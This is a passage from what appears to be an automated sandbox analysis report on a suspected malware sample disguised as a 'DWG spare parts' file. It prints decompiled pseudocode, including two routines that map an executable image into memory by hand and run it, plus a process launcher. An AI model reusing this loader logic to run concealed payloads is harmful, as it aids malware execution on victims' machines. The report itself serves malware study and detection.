                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                • String ID:
                                                                • API String ID: 185507032-0
                                                                • Opcode ID: bb309dfd9441fb225c89291859def52419afcb2f43cca775a1139ad32574fe74
                                                                • Instruction ID: d774e99979422327d60548b3293fa6743445814e24d9ca7a3a9fdb8a454835ce
                                                                • Opcode Fuzzy Hash: bb309dfd9441fb225c89291859def52419afcb2f43cca775a1139ad32574fe74
                                                                • Instruction Fuzzy Hash: 08111CB2584206BBF301EBA4CC85F9A77EEBB85700F404916B255D70D0DA75E944CB6E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02525722 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98processsynchronizationCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E02525722(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				struct _STARTUPINFOA _v72;
				struct _PROCESS_INFORMATION _v88;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				CHAR* _t49;
				int _t54;
				void* _t67;
				intOrPtr _t83;
				short _t86;
				void* _t88;
				void* _t91;

				_t93 = __eflags;
				_v360 = 0;
				_v368 = 0;
				_v364 = 0;
				_v348 = 0;
				_v352 = 0;
				_v356 = 0;
				_t86 = __ecx;
				_t88 = __edx;
				_t67 = __eax;
				_push(_t91);
				_push(0x2525888);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91 + 0xfffffe94;
				_push(0x25258a0);
				E02514B04( &_v352, __eax, __eflags);
				_push(_v352);
				_push(0x25258ac);
				E02514B04( &_v356, _t88, __eflags);
				_push(_v356);
				E02514C24();
				E02514B3C( &_v344, 0xff, _v348);
				E02513518( &_v72, 0x44);
				_v72.cb = 0x44;
				_v72.dwFlags = 1;
				_v72.wShowWindow = _t86;
				E02514B04( &_v364, _t67, _t93);
				E025181AC(_v364,  &_v360);
				_t49 = E02514D64(_v360);
				E02514B04( &_v368,  &_v344, _t93);
				_t54 = CreateProcessA(0, E02514D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
				asm("sbb eax, eax");
				if(_t54 + 1 != 0) {
					WaitForSingleObject(_v88.hProcess, 0xffffffff);
					CloseHandle(_v88);
					CloseHandle(_v88.hThread);
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(E0252588F);
				return E025148C4( &_v368, 6);
			}



















                                                                0x02525722
                                                                0x02525732
                                                                0x02525738
                                                                0x0252573e
                                                                0x02525744
                                                                0x0252574a
                                                                0x02525750
                                                                0x02525756
                                                                0x02525758
                                                                0x0252575a
                                                                0x0252575e
                                                                0x0252575f
                                                                0x02525764
                                                                0x02525767
                                                                0x0252576a
                                                                0x02525777
                                                                0x0252577c
                                                                0x02525782
                                                                0x0252578f
                                                                0x02525794
                                                                0x025257a5
                                                                0x025257bb
                                                                0x025257ca
                                                                0x025257cf
                                                                0x025257d6
                                                                0x025257dd
                                                                0x025257f1
                                                                0x02525802
                                                                0x0252580d
                                                                0x02525829
                                                                0x0252583c
                                                                0x02525844
                                                                0x0252584b
                                                                0x02525853
                                                                0x0252585c
                                                                0x02525865
                                                                0x02525865
                                                                0x0252586c
                                                                0x0252586f
                                                                0x02525872
                                                                0x02525887

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252583C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525853
                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252585C
                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 2059082233-2746444292
                                                                • Opcode ID: d0b804083d4eec0d328dc77a970b2602b306dff6b8b5f07bf10e92e9fe5bc97d
                                                                • Instruction ID: 587cf80a35bc4cc6b0a73620bc7c2b2e8bed606a63a2245f0d91c501005f9303
                                                                • Opcode Fuzzy Hash: d0b804083d4eec0d328dc77a970b2602b306dff6b8b5f07bf10e92e9fe5bc97d
                                                                • Instruction Fuzzy Hash: 46315271A003599FEF20DF94CC81BDEB7B9FB89310F5041B5A508A7280DA759E89CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02525724 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97processsynchronizationCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E02525724(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				struct _STARTUPINFOA _v72;
				struct _PROCESS_INFORMATION _v88;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				CHAR* _t49;
				int _t54;
				void* _t67;
				intOrPtr _t83;
				short _t86;
				void* _t88;
				void* _t91;

				_t93 = __eflags;
				_v360 = 0;
				_v368 = 0;
				_v364 = 0;
				_v348 = 0;
				_v352 = 0;
				_v356 = 0;
				_t86 = __ecx;
				_t88 = __edx;
				_t67 = __eax;
				_push(_t91);
				_push(0x2525888);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91 + 0xfffffe94;
				_push(0x25258a0);
				E02514B04( &_v352, __eax, __eflags);
				_push(_v352);
				_push(0x25258ac);
				E02514B04( &_v356, _t88, __eflags);
				_push(_v356);
				E02514C24();
				E02514B3C( &_v344, 0xff, _v348);
				E02513518( &_v72, 0x44);
				_v72.cb = 0x44;
				_v72.dwFlags = 1;
				_v72.wShowWindow = _t86;
				E02514B04( &_v364, _t67, _t93);
				E025181AC(_v364,  &_v360);
				_t49 = E02514D64(_v360);
				E02514B04( &_v368,  &_v344, _t93);
				_t54 = CreateProcessA(0, E02514D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
				asm("sbb eax, eax");
				if(_t54 + 1 != 0) {
					WaitForSingleObject(_v88.hProcess, 0xffffffff);
					CloseHandle(_v88);
					CloseHandle(_v88.hThread);
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(E0252588F);
				return E025148C4( &_v368, 6);
			}



















                                                                0x02525724
                                                                0x02525732
                                                                0x02525738
                                                                0x0252573e
                                                                0x02525744
                                                                0x0252574a
                                                                0x02525750
                                                                0x02525756
                                                                0x02525758
                                                                0x0252575a
                                                                0x0252575e
                                                                0x0252575f
                                                                0x02525764
                                                                0x02525767
                                                                0x0252576a
                                                                0x02525777
                                                                0x0252577c
                                                                0x02525782
                                                                0x0252578f
                                                                0x02525794
                                                                0x025257a5
                                                                0x025257bb
                                                                0x025257ca
                                                                0x025257cf
                                                                0x025257d6
                                                                0x025257dd
                                                                0x025257f1
                                                                0x02525802
                                                                0x0252580d
                                                                0x02525829
                                                                0x0252583c
                                                                0x02525844
                                                                0x0252584b
                                                                0x02525853
                                                                0x0252585c
                                                                0x02525865
                                                                0x02525865
                                                                0x0252586c
                                                                0x0252586f
                                                                0x02525872
                                                                0x02525887

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252583C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525853
                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252585C
                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 2059082233-2746444292
                                                                • Opcode ID: db86f11c852da97ce3318ae4658e05f1ceb9ea3f34f58bc5ddeeeea76afa0d85
                                                                • Instruction ID: 3edb7ac687af855a89af7faccc499d8451c6434dbb75f249348c1a62db1aff2e
                                                                • Opcode Fuzzy Hash: db86f11c852da97ce3318ae4658e05f1ceb9ea3f34f58bc5ddeeeea76afa0d85
                                                                • Instruction Fuzzy Hash: 12315271A003599FEF20DF94CC81BDEB7B9FB89310F5041B5A508A7280DA759E89CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02513B00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 63%
                                                                			E02513B00() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x252d024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t14 =  *0x252d024 & 0xffc0 | _v12 & 0x3f;
					 *0x252d024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E02513B71);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x2513b78);
					return RegCloseKey(_v8);
				}
			}











                                                                0x02513b01
                                                                0x02513b03
                                                                0x02513b0d
                                                                0x02513b29
                                                                0x02513b8b
                                                                0x02513b8e
                                                                0x02513b97
                                                                0x02513b2b
                                                                0x02513b2d
                                                                0x02513b2e
                                                                0x02513b33
                                                                0x02513b36
                                                                0x02513b39
                                                                0x02513b55
                                                                0x02513b5c
                                                                0x02513b5f
                                                                0x02513b62
                                                                0x02513b70
                                                                0x02513b70

                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02513B22
                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02513B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02513B55
                                                                • RegCloseKey.ADVAPI32(?,02513B78,00000000,?,00000004,00000000,02513B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02513B6B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                • API String ID: 3677997916-4173385793
                                                                • Opcode ID: e17e801cb2c97ebd2502ea447fed7950e0d0debd6ef11bcb6bf0849e25d4cfc7
                                                                • Instruction ID: 7419c551da6aebe71eef179d3b912f3076a910b4d4a3db9c38fbdf29678a555a
                                                                • Opcode Fuzzy Hash: e17e801cb2c97ebd2502ea447fed7950e0d0debd6ef11bcb6bf0849e25d4cfc7
                                                                • Instruction Fuzzy Hash: 72019E75940318BAFB11EBA1CC52BB97BF8EB49B00F5044E1BA04E65C0F674AA14DB5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02524F34 Relevance: 7.7, APIs: 5, Instructions: 188memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 67%
                                                                			E02524F34(intOrPtr __eax, void* __ebx, void* __ecx, long __edi, void* __esi, void* __fp0) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v40;
				signed int _v44;
				long _v48;
				char _v52;
				void* _t136;
				void* _t149;
				signed int _t186;
				signed int _t187;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t211;
				signed int _t212;
				void* _t215;
				void* _t218;
				intOrPtr* _t219;

				_t210 = __edi;
				_t185 = __ebx;
				_t217 = _t218;
				_t219 = _t218 + 0xffffffd0;
				_push(__ebx);
				_push(__edi);
				_v32 = __eax;
				_t198 =  *0x2524ba8; // 0x2524bac
				E025152D4( &_v16, _t198);
				_push(_t218);
				_push(0x2525141);
				_push( *[fs:eax]);
				 *[fs:eax] = _t219;
				_push(0);
				_push(_v32);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) +  *_t219;
				_v20 = VirtualAlloc(0,  *(_v24 + 0x50), 0x2000, 1);
				_v28 = _v20 -  *((intOrPtr*)(_v24 + 0x34));
				_v40 = VirtualAlloc(_v20,  *(_v24 + 0x54), 0x1000, 4);
				E02512DC8(_v32, __ebx,  *(_v24 + 0x54), _v40);
				VirtualProtect(_v40,  *(_v24 + 0x54), 2,  &_v48);
				_t215 = _v24 + 0x18 + ( *(_v24 + 0x14) & 0x0000ffff);
				_t136 = ( *(_v24 + 6) & 0x0000ffff) - 1;
				if(_t136 >= 0) {
					_v52 = _t136 + 1;
					_t187 = 0;
					do {
						_t210 =  *(_t215 + 8 + (_t187 + _t187 * 4) * 8);
						_v44 =  *((intOrPtr*)(_t215 + 0x10 + (_t187 + _t187 * 4) * 8));
						if(_t210 < _v44) {
							_t212 = _t210 ^ _v44;
							_v44 = _v44 ^ _t212;
							_t210 = _t212 ^ _v44;
						}
						_v40 = VirtualAlloc( *((intOrPtr*)(_t215 + 0xc + (_t187 + _t187 * 4) * 8)) + _v20, _t210, 0x1000, 4);
						E02513518(_v40, _t210);
						E02512DC8( *((intOrPtr*)(_t215 + 0x14 + (_t187 + _t187 * 4) * 8)) + _v32, _t187, _v44, _v40);
						_t187 = _t187 + 1;
						_t65 =  &_v52;
						 *_t65 = _v52 - 1;
					} while ( *_t65 != 0);
				}
				_v12 =  *((intOrPtr*)(_v24 + 0x28)) + _v20;
				_v16 = _v20;
				_push(0);
				E02515A04();
				_t144 =  *((intOrPtr*)(_v24 + 0xa0));
				if( *((intOrPtr*)(_v24 + 0xa0)) != 0) {
					E02524D68(_t144 + _v20, _t217);
				}
				_t146 =  *((intOrPtr*)(_v24 + 0x80));
				if( *((intOrPtr*)(_v24 + 0x80)) != 0) {
					E02524DE8(_t146 + _v20, _t185, _t210, _t215, _t217);
				}
				_t149 = ( *(_v24 + 6) & 0x0000ffff) - 1;
				if(_t149 >= 0) {
					_v52 = _t149 + 1;
					_t186 = 0;
					do {
						_t211 = _t186 + _t186 * 4;
						VirtualProtect( *((intOrPtr*)(_t215 + 0xc + _t211 * 8)) + _v20,  *(_t215 + 8 + _t211 * 8), E02524D20( *((intOrPtr*)(_t215 + 0x24 + _t211 * 8))),  &_v48);
						_t186 = _t186 + 1;
						_t96 =  &_v52;
						 *_t96 = _v52 - 1;
					} while ( *_t96 != 0);
				}
				if(_v12 != 0) {
					_push(0);
					_push(1);
					_push(_v20);
					if(_v12() == 0) {
						_v12 = 0;
					}
				}
				_t151 =  *((intOrPtr*)(_v24 + 0x78));
				if( *((intOrPtr*)(_v24 + 0x78)) != 0) {
					E02524D38(_t151 + _v20,  *((intOrPtr*)(_v24 + 0x7c)), _t217);
				}
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(E02525148);
				_t205 =  *0x2524ba8; // 0x2524bac
				return E02515398( &_v16, _t205);
			}


























                                                                0x02524f34
                                                                0x02524f34
                                                                0x02524f35
                                                                0x02524f37
                                                                0x02524f3a
                                                                0x02524f3c
                                                                0x02524f3d
                                                                0x02524f43
                                                                0x02524f49
                                                                0x02524f50
                                                                0x02524f51
                                                                0x02524f56
                                                                0x02524f59
                                                                0x02524f61
                                                                0x02524f62
                                                                0x02524f69
                                                                0x02524f6d
                                                                0x02524f74
                                                                0x02524f8c
                                                                0x02524f98
                                                                0x02524fb2
                                                                0x02524fc1
                                                                0x02524fd7
                                                                0x02524fe9
                                                                0x02524ff2
                                                                0x02524ff5
                                                                0x02524ff8
                                                                0x02524ffb
                                                                0x02524ffd
                                                                0x02525000
                                                                0x0252500b
                                                                0x02525011
                                                                0x02525013
                                                                0x02525016
                                                                0x02525019
                                                                0x02525019
                                                                0x02525034
                                                                0x0252503e
                                                                0x02525053
                                                                0x02525058
                                                                0x02525059
                                                                0x02525059
                                                                0x02525059
                                                                0x02524ffd
                                                                0x02525067
                                                                0x0252506d
                                                                0x02525070
                                                                0x02525080
                                                                0x0252508b
                                                                0x02525093
                                                                0x02525099
                                                                0x0252509e
                                                                0x025250a2
                                                                0x025250aa
                                                                0x025250b0
                                                                0x025250b5
                                                                0x025250bd
                                                                0x025250c0
                                                                0x025250c3
                                                                0x025250c6
                                                                0x025250c8
                                                                0x025250cc
                                                                0x025250e6
                                                                0x025250eb
                                                                0x025250ec
                                                                0x025250ec
                                                                0x025250ec
                                                                0x025250c8
                                                                0x025250f5
                                                                0x025250f7
                                                                0x025250f9
                                                                0x025250fe
                                                                0x02525104
                                                                0x02525108
                                                                0x02525108
                                                                0x02525104
                                                                0x0252510e
                                                                0x02525113
                                                                0x0252511f
                                                                0x02525124
                                                                0x02525127
                                                                0x0252512a
                                                                0x0252512d
                                                                0x02525135
                                                                0x02525140

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02524F87
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FAD
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FD7
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0252502F
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 025250E6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Alloc$Protect
                                                                • String ID:
                                                                • API String ID: 655996629-0
                                                                • Opcode ID: 50de9932c97f766967accdd06d3ce4162e492389bfafa335b961e9094137b725
                                                                • Instruction ID: 1c868ed8f465b16307f4452b3254a1bd5168e1992fb0192f82bc68b2a7af46a0
                                                                • Opcode Fuzzy Hash: 50de9932c97f766967accdd06d3ce4162e492389bfafa335b961e9094137b725
                                                                • Instruction Fuzzy Hash: 21711475A0021A9FDB14DFA8C880EAEB7F9FF88300F554465E940EB295E730E945CB68
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025243F8 Relevance: 7.7, APIs: 5, Instructions: 171memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			E025243F8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v52;
				long _v56;
				char _v60;
				void* _t134;
				void* _t150;
				signed int _t183;
				signed int _t184;
				intOrPtr _t188;
				intOrPtr _t196;
				intOrPtr _t200;
				intOrPtr _t202;
				intOrPtr _t203;
				signed int _t207;
				signed int _t208;
				void* _t211;
				void* _t214;

				_t206 = __edi;
				_t213 = _t214;
				_push(__edi);
				_v44 = __ecx;
				_t182 = __edx;
				_v40 = __eax;
				_t196 =  *0x2523864; // 0x2523868
				E025152D4( &_v36, _t196);
				_push(_t214);
				_push(0x25245e6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t214 + 0xffffffc8;
				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) + _v44;
				_v16 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1);
				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
				_v48 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4);
				E02512DC8(_v44, _t182,  *(_v8 + 0x54), _v48);
				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56);
				_t211 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
				_t134 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t134 >= 0) {
					_v60 = _t134 + 1;
					_t184 = 0;
					do {
						_t206 =  *(_t211 + 8 + (_t184 + _t184 * 4) * 8);
						_v52 =  *((intOrPtr*)(_t211 + 0x10 + (_t184 + _t184 * 4) * 8));
						if(_t206 < _v52) {
							_t208 = _t206 ^ _v52;
							_v52 = _v52 ^ _t208;
							_t206 = _t208 ^ _v52;
						}
						_v48 = VirtualAlloc( *((intOrPtr*)(_t211 + 0xc + (_t184 + _t184 * 4) * 8)) + _v16, _t206, 0x1000, 4);
						E02513518(_v48, _t206);
						E02512DC8( *((intOrPtr*)(_t211 + 0x14 + (_t184 + _t184 * 4) * 8)) + _v44, _t184, _v52, _v48);
						_t184 = _t184 + 1;
						_t66 =  &_v60;
						 *_t66 = _v60 - 1;
					} while ( *_t66 != 0);
				}
				_v24 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
				_v28 = _v24;
				_v36 = _v16;
				_v32 =  *(_v8 + 0x50);
				_push(0);
				_t200 =  *0x2523828; // 0x252382c
				E02515A04();
				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
					E0252421C(_t145 + _v16, _t213);
				}
				_t147 =  *((intOrPtr*)(_v8 + 0x80));
				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
					E0252429C(_t147 + _v16, _t182, _t206, _t211, _t213);
				}
				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t150 >= 0) {
					_v60 = _t150 + 1;
					_t183 = 0;
					do {
						_t207 = _t183 + _t183 * 4;
						VirtualProtect( *((intOrPtr*)(_t211 + 0xc + _t207 * 8)) + _v16,  *(_t211 + 8 + _t207 * 8), E025239F4( *((intOrPtr*)(_t211 + 0x24 + _t207 * 8)), _t200),  &_v56);
						_t183 = _t183 + 1;
						_t102 =  &_v60;
						 *_t102 = _v60 - 1;
					} while ( *_t102 != 0);
				}
				_t188 =  *0x2523864; // 0x2523868
				E025155FC(_a4, _t188,  &_v36);
				_pop(_t202);
				 *[fs:eax] = _t202;
				_push(E025245ED);
				_t203 =  *0x2523864; // 0x2523868
				return E02515398( &_v36, _t203);
			}






























                                                                0x025243f8
                                                                0x025243f9
                                                                0x02524400
                                                                0x02524401
                                                                0x02524404
                                                                0x02524406
                                                                0x0252440c
                                                                0x02524412
                                                                0x02524419
                                                                0x0252441a
                                                                0x0252441f
                                                                0x02524422
                                                                0x0252442e
                                                                0x02524445
                                                                0x02524451
                                                                0x0252446b
                                                                0x0252447a
                                                                0x02524490
                                                                0x025244a2
                                                                0x025244ab
                                                                0x025244ae
                                                                0x025244b1
                                                                0x025244b4
                                                                0x025244b6
                                                                0x025244b9
                                                                0x025244c4
                                                                0x025244ca
                                                                0x025244cc
                                                                0x025244cf
                                                                0x025244d2
                                                                0x025244d2
                                                                0x025244ed
                                                                0x025244f7
                                                                0x0252450c
                                                                0x02524511
                                                                0x02524512
                                                                0x02524512
                                                                0x02524512
                                                                0x025244b6
                                                                0x02524520
                                                                0x02524526
                                                                0x0252452c
                                                                0x02524535
                                                                0x02524538
                                                                0x02524542
                                                                0x02524548
                                                                0x02524553
                                                                0x0252455b
                                                                0x02524561
                                                                0x02524566
                                                                0x0252456a
                                                                0x02524572
                                                                0x02524578
                                                                0x0252457d
                                                                0x02524585
                                                                0x02524588
                                                                0x0252458b
                                                                0x0252458e
                                                                0x02524590
                                                                0x02524594
                                                                0x025245ae
                                                                0x025245b3
                                                                0x025245b4
                                                                0x025245b4
                                                                0x025245b4
                                                                0x02524590
                                                                0x025245bf
                                                                0x025245c5
                                                                0x025245cc
                                                                0x025245cf
                                                                0x025245d2
                                                                0x025245da
                                                                0x025245e5

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000001,00000000,025245E6,?,0255D33C,?,0256D338), ref: 02524440
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001,00000000,025245E6,?,0255D33C,?,0256D338), ref: 02524466
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001,00000000,025245E6,?,0255D33C), ref: 02524490
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 025244E8
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,0256D338), ref: 025245AE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Alloc$Protect
                                                                • String ID:
                                                                • API String ID: 655996629-0
                                                                • Opcode ID: 1e75a396e864f5c5ee54b0d9a2cb5bdf80d135c8998e1fe63ae6ca1c8e6f0888
                                                                • Instruction ID: 61c7695cc88b4832e47a899cb705389f48df174c335f5d6e0ce21ce22d6abe14
                                                                • Opcode Fuzzy Hash: 1e75a396e864f5c5ee54b0d9a2cb5bdf80d135c8998e1fe63ae6ca1c8e6f0888
                                                                • Instruction Fuzzy Hash: E671CF75A00219AFDB10DFA9D980AAEB7F9FF48310F1544A5E944EB295D630EE04CF64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251AC5C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 64%
                                                                			E0251AC5C(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x251acf3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0251A9D0(GetThreadLocale(), 0x251ad08, 0x100b,  &_v8);
				_t29 = E02517DDC(0x251ad08, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0251ABA8, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x256c8f0;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0251ABE4, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0251ACFA);
				return E025148A0( &_v8);
			}










                                                                0x0251ac5c
                                                                0x0251ac5f
                                                                0x0251ac64
                                                                0x0251ac65
                                                                0x0251ac6a
                                                                0x0251ac6d
                                                                0x0251ac83
                                                                0x0251ac95
                                                                0x0251ac9f
                                                                0x0251acaf
